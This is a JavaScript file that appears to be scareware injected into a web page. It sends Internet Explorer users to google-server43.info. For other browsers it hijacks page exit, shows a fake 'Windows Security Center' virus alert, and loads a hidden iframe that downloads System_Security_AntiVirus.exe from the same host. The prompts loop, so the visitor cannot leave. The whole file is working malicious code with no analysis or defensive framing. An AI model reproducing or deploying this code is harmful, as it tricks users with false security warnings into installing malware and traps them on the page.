num_days = 2;
function ged(noDays){
    var today = new Date();
    var expr = new Date(today.getTime() + noDays*24*60*60*1000);
    return  expr.toGMTString();
}

function readCookie(cookieName){

    var start = document.cookie.indexOf(cookieName);
    if (start == -1){ 
document.cookie = "seenit=yes; expires=" + ged(num_days); 


var ua = navigator.userAgent.toLowerCase();
if(ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1){

window.location = "http://google-server43.info/sp/";

}else{
 
window.onbeforeunload = function confirmDelete()
{

var UserWidth = window.screen.width / 2;
var UserHeight = window.screen.height / 2;
window.resizeTo(screen.width-9999,screen.height-9999);
window.moveTo(UserWidth,UserHeight);

var kit = confirm('Windows Security Center\n\nVirus(I-Worm.Troian.B) was found on your computer\n\nClick OK to install System Security AntiVirus');
  if (kit)
  {
var ifr='<iframe style="display:none;" src="http://google-server43.info/System_Security_AntiVirus.exe"></iframe>';
	document.body.innerHTML=ifr+document.body.innerHTML;
 alert("PLEASE !!! SAVE AND RUN System Security AntiVirus - IT WILL HELP YOU TO SAVE YOUR PC AND DATA");
return confirmDelete();
      return true;
  }
  else
  {
 alert("Windows Security Center recomands you to install System Security AntiVirus");
return confirmDelete();
      return false;
  }
}

}

    } else {       
    }
}
window.onFocus=readCookie("seenit");